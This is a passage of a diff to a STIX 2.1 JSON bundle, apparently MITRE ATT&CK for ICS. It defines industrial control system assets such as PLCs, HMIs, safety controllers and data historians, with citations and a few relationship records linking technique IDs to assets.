"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0033", + "external_id": "A0033" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2023-10-04T19:26:49.788Z", + "name": "Field I/O", + "description": "Field I/O are devices that communicate with a controller or data aggregator to either send input data or receive output data. Input data may include readings about a given environment/device state from sensors, while output data may include data sent back to actuators for them to either undertake actions or change parameter values.(Citation: Guidance - NIST SP800-82) These devices are frequently embedded devices running on lightweight embedded operating systems or RTOSes. ", + "x_mitre_sectors": [], + "x_mitre_related_assets": [ + { + "name": "Smart Sensors", + "related_asset_sectors": [ + "General" + ], + "description": "*A device that procures a voltage or current output that is representative of some physical property being measured (e.g., speed, temperature, flow).* (Citation: Guidance - NIST SP800-82) Smart sensors take this functionality and add on on-device processing and network communication." + }, + { + "name": "Variable Frequency Drive (VFD)", + "related_asset_sectors": [ + "General" + ], + "description": "*A type of drive that controls the speed, but not the precise position, of a non-servo, AC motor by varying the frequency of the electricity going to that motor. VFDs are typically used for applications where speed and power are important, but precise positioning is not.* (Citation: Guidance - NIST SP800-82) VFDs can be network connected." + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "created": "2023-09-28T17:57:22.946Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0013", + "external_id": "A0013" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-05-21T16:23:41.133Z", + "name": "Endpoint/Server (OS:Windows)", + "description": "", + "x_mitre_sectors": [], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.2", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "created": "2024-05-21T16:23:19.410Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0016", + "external_id": "A0016" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2023-10-04T17:59:11.489Z", + "name": "Human-Machine Interface (HMI)", + "description": "Human-Machine Interfaces (HMIs) are systems used by an operator to monitor the real-time status of an operational process and to perform necessary control functions, including the adjustment of device parameters. An HMI can take various forms, including a dedicated screen or control panel integrated with a specific device/controller, or a customizable software GUI application running on a standard operating system (e.g., MS Windows) that interfaces with a control/SCADA server. The HMI is critical to ensuring operators have sufficient visibility and control over the operational process.", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [ + { + "name": "Operator Workstation (OWS)", + "related_asset_sectors": [ + "General" + ], + "description": "An Operator Workstation (OWS) or Console is a system or device used by an operator to interface with a control system, including to access/visualizes key information or parameters about the operational process and initiate control actions. This typically consists of specialized OWS software installed on a Workstation platform. (Citation: IEC February 2019)" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "created": "2023-09-28T14:38:54.407Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0002", + "external_id": "A0002" + }, + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-05-30T15:19:02.847Z", + "name": "Endpoint/Server: (OS Linux)", + "description": "", + "x_mitre_sectors": [], + "x_mitre_related_assets": [ + { + "name": "Jump Host", + "related_asset_sectors": [], + "description": "" + }, + { + "name": "HMI", + "related_asset_sectors": [], + "description": "" + }, + { + "name": "Control Server", + "related_asset_sectors": [], + "description": "" + } + ], + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.2", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "created": "2024-05-21T16:19:57.018Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0015", + "external_id": "A0015" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2024-05-30T15:26:58.383Z", + "name": "Containers", + "description": "", + "x_mitre_sectors": [], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Cloud" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "created": "2024-05-30T15:26:58.383Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0020", + "external_id": "A0020" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2023-10-04T18:08:33.386Z", + "name": "Data Gateway", + "description": "Data Gateway is a device that supports the communication and exchange of data between different systems, networks, or protocols within the ICS. Different types of data gateways are used to perform various functions, including:\n\n * Protocol Translation: Enable communication to devices that support different or incompatible protocols by translating information from one protocol to another. \n * Media Converter: Convert data across different Layer 1 and 2 network protocols / mediums, for example, converting from Serial to Ethernet. \n * Data Aggregation: Collect and combine data from different devices into one consistent format and protocol interface. \n\nData gateways are often critical to the forwarding/transmission of critical control or monitoring data within the ICS. Further, these devices often have remote various network services that are used to communicate across different zones or networks. \n\nThese assets may focus on a single function listed below or combinations of these functions to best fit the industry use-case. \n", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [ + { + "name": "Data Acquisition Server (DAS)", + "related_asset_sectors": [ + "General" + ], + "description": "A Data Acquisition Server (DAS) a system or software platform that is used to collect, aggregate, and store data/telemetry from field devices using various SCADA/Automation protocols. " + }, + { + "name": "Serial to Ethernet Gateway", + "related_asset_sectors": [ + "Electric", + "General" + ], + "description": "A Serial to Ethernet gateway is a device that is used to connect field devices that only support serial-based communication (e.g., RS-232) with more modern Ethernet-based networks. " + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "created": "2023-09-28T15:01:48.509Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0009", + "external_id": "A0009" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-16T18:49:08.504Z", + "name": "Safety Controller", + "description": "Safety controllers are typically a type of field device used to perform the safety critical function. Safety controllers often support the deployment of custom programs/logic, similar to a PLC, but can also be tailored for sector specific functions/applications. The safety controllers typically utilize redundant hardware and processors to ensure they operate reliably if a component fails.", + "x_mitre_sectors": [], + "x_mitre_related_assets": [ + { + "name": "Safety Instrumented System (SIS) controller", + "related_asset_sectors": [], + "description": "SIS controllers are used to “take the process to a safe state when predetermined conditions are violated” (Citation: Guidance - NIST SP800-82) through the reading of sensor data and interaction with digital/physical control surfaces. These devices are oftentimes located on programmable embedded devices running specialized RTOS or other embedded operating systems. " + }, + { + "name": "Emergency Shutdown Systems (ESD) controller", + "related_asset_sectors": [], + "description": "Emergency Shutdown System controllers are used to read sensor values and interact with control surfaces to return the system “to a safe static condition so that any remedial action can be taken”. (Citation: SIGTTO ESD 2021)" + }, + { + "name": "Burner Management Systems (BMS) controller", + "related_asset_sectors": [], + "description": "Burner Management System controllers are used to interact with sensors and control surfaces to maintain safe operating conditions for the burner. These can include safely starting-up and managing the main flame, controlling and monitoring the burning conditions, and safely initiating planned or unplanned shutdown sequences." + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "created": "2023-09-28T15:10:05.534Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0010", + "external_id": "A0010" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "SIGTTO ESD 2021", + "description": "Society of International Gas Tanker & Terminal Operators Ltd. (2021). ESD Systems: Recommendations for Emergency Shutdown and Related Safety Systems (Second Edition). Retrieved September 28, 2023.", + "url": "https://sigtto.org/media/3457/sigtto-2021-esd-systems.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-04T18:01:02.506Z", + "name": "Intelligent Electronic Device (IED)", + "description": "An Intelligent Electronic Device (IED) is a type of specialized field device that is designed to perform specific operational functions, frequently for protection, monitoring, or control within the electric sector. IEDs are typically used to both acquire telemetry and execute tailored control algorithms/actions based on customizable parameters/settings. An IED is usually implemented as a dedicated embedded device and supports various network automation protocols to communicate with RTUs and Control Servers.", + "x_mitre_sectors": [ + "Electric" + ], + "x_mitre_related_assets": [ + { + "name": "Protection Relay", + "related_asset_sectors": [ + "Electric" + ], + "description": "A protection relay is a type of IED used within the electric sector to monitor for faults or problematic operating conditions on power lines, busses, or transformers. While traditionally protection relays were electromechanical or electromagnetic devices, modern relays utilize microprocessors, embedded operating system, and SCADA communications." + }, + { + "name": "Field Device / Controller", + "related_asset_sectors": [], + "description": "IEDs may be referred to as Field Controllers or Field Devices as a general function name. " + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "created": "2023-09-28T14:46:42.566Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0005", + "external_id": "A0005" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-06-24T14:45:36.793Z", + "name": "Cloud Software (SaaS)", + "description": "", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_platforms": [], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "created": "2024-05-30T15:22:21.321Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0018", + "external_id": "A0018" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2024-05-30T15:21:30.103Z", + "name": "Identity and Access Management (Windows, Azure AD, Entra ID)", + "description": "", + "x_mitre_sectors": [], + "x_mitre_related_assets": [ + { + "name": "Domain Controller", + "related_asset_sectors": [ + "General" + ], + "description": "" + } + ], + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "created": "2024-05-30T15:21:14.137Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0017", + "external_id": "A0017" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2023-10-04T17:46:20.340Z", + "name": "Application Server", + "description": "Application servers are used across many different sectors to host various diverse software applications necessary to supporting the ICS. Example functions can include data analytics and reporting, alarm management, and the management/coordination of different control servers. The application server typically runs on a modern server operating system (e.g., MS Windows Server).", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "created": "2023-09-28T14:58:00.982Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0008", + "external_id": "A0008" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-04T18:09:21.296Z", + "name": "Programmable Logic Controller (PLC)", + "description": "A Programmable Logic Controller (PLC) is an embedded programmable control device. PLCs typically utilize a modular architecture with separate modules used to support its processing capabilities, communication mediums, and I/O interfaces. PLCs allow for the deployment of customized programs/logic to control or monitor an operational process. This logic is defined using industry specific programming languages, such as IEC 61131 (Citation: IEC February 2013), which define the set of tasks and program organizational units (POUs) included in the device’s programs. PLCs also typically have distinct operating modes (e.g., Remote, Run, Program, Stop) which are used to determine when the device can be programmed or whether it should execute the custom logic.", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [ + { + "name": "Process Automation Controller (PAC)", + "related_asset_sectors": [ + "General" + ], + "description": "Process Automation Controllers (PAC) share much of the same functionality as a PLC. PACs may include advanced features for process control, motion control, drive control, and vision applications. PACs may include additional features such as options to program in traditional programming languages such as C and C++ in addition to 61131 programming languages in order to support these more advanced controls. " + }, + { + "name": "Field Device / Controller", + "related_asset_sectors": [], + "description": "Programmable Logic Controller (PLC) may be referred to as Field Controllers or Field Devices as a general function name. " + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "created": "2023-09-28T14:43:05.105Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0003", + "external_id": "A0003" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-05-30T15:28:49.087Z", + "name": "Firewall", + "description": "", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--a2747432-b914-4bfb-b905-ef44f446a3ff", + "created": "2024-05-30T15:28:49.087Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0021", + "external_id": "A0021" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2024-05-30T15:29:20.916Z", + "name": "Routers and Switches", + "description": "A computer that is a gateway between two networks at OSI layer 3 and that relays and directs data packets through that inter-network. The most common form of router operates on IP packets.(Citation: IETF RFC4949 2007)", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "created": "2023-09-29T18:55:09.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0014", + "external_id": "A0014" + }, + { + "source_name": "IETF RFC4949 2007", + "description": "Internet Engineering Task Force. (2007, August). Internet Security Glossary, Version 2. Retrieved September 29, 2023.", + "url": "https://www.ietf.org/rfc/rfc4949.txt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-05-30T15:24:40.201Z", + "name": "Cloud Infrastructure (IaaS)", + "description": "", + "x_mitre_sectors": [], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Cloud" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "created": "2024-05-30T15:23:03.619Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0019", + "external_id": "A0019" + } + ], + "object_marking_refs": [] + }, + { + "modified": "2023-10-04T17:57:56.558Z", + "name": "Data Historian", + "description": "Data historians, or historian, are systems used to collect and store data, including telemetry, events, alerts, and alarms about the operational process and supporting devices. The historian typically utilizes a database to store this data, and commonly provide tools and interfaces to support the analysis of the data. Data historians are often used to support various engineering or business analysis functions and therefore commonly needs access from the corporate network. Data historians often work in a hierarchical paradigm where lower/site level historians collect and store data which is then aggregated into a site/plant level historian. Therefore, data historians often have remote services that can be accessed externally from the ICS network.", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "created": "2023-09-28T14:48:36.305Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0006", + "external_id": "A0006" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-04T18:09:59.538Z", + "name": "Control Server", + "description": "Control servers are typically a software platform that runs on a modern server operating system (e.g., MS Windows Server). The server typically uses one or more automation protocols (e.g., Modbus, DNP3) to communicate with the various low-level control devices such as Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs). The control server also usually provides an interface/network service to connect with an HMI.", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [ + { + "name": "Supervisory Control And Data Acquisition (SCADA) Server", + "related_asset_sectors": [ + "General", + "Electric", + "Water and Wastewater" + ], + "description": "A SCADA server is used to perform monitoring and control across a distributed environment. It typically has an associated HMI to provide information to a human operator and heavily depends on the human operator to initiate control actions." + }, + { + "name": "Master Terminal Unit (MTU)", + "related_asset_sectors": [ + "General" + ], + "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)" + }, + { + "name": "Supervisory controller", + "related_asset_sectors": [ + "General" + ], + "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)" + }, + { + "name": "Distribution/Energy Management System (DMS/EMS)", + "related_asset_sectors": [ + "Electric" + ], + "description": "A DMS and EMS are electric sector specific devices that are commonly used to manage distribution and transmission-level electrical grids. These platforms typically integrate a SCADA server and HMI with domain-specific data analysis applications, such as state-estimation and contingency analysis (EMS), or voltage-var control or fault restoration (DMS). " + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "created": "2023-09-28T14:55:39.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0007", + "external_id": "A0007" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-28T14:23:52.358Z", + "name": "Workstation", + "description": "Workstations are devices used by human operators or engineers to perform various configuration, programming, maintenance, diagnostic, or operational tasks. Workstations typically utilize standard desktop or laptop hardware and operating systems (e.g., MS Windows), but run dedicated control system applications or diagnostic/management software to support interfacing with the control servers or field devices. Some workstations have a fixed location within the network architecture, while others are transient devices that are directly connected to various field devices to support local management activities.", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [ + { + "name": "Transient Cyber Asset (TCA)", + "related_asset_sectors": [ + "Electric" + ], + "description": "A Transient Cyber Asset (TCA)(Citation: North American Electric Reliability Corporation June 2021) is a mobile workstation that is used to support management functions across multiple different networks, rather than being dedicated to any specific device/network. The TCA is often used to directly manage ICS environments that do not have any dedicated support for external remote access. Therefore, the TCA provides a mechanism for connectivity and file transfer to many networks/devices, even if they are segmented or “air gapped” from other networks. " + }, + { + "name": "Engineering Workstation (EWS)", + "related_asset_sectors": [ + "General" + ], + "description": "An Engineering Workstation (EWS) is used to perform various maintenance, configuration, or diagnostics functions for a control system. The EWS will likely require dedicated application software to interface with various devices (e.g., RTUs, PLCs), and may be used to transfer data or files between the control system devices and other networks. " + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "created": "2023-09-28T14:22:49.837Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0001", + "external_id": "A0001" + }, + { + "source_name": "North American Electric Reliability Corporation June 2021", + "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", + "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0005d8b9-4e84-4d90-9e2f-c7f7bf3ce97f", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0020bed6-9cce-46ad-93b9-df9d4aaefa38", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + 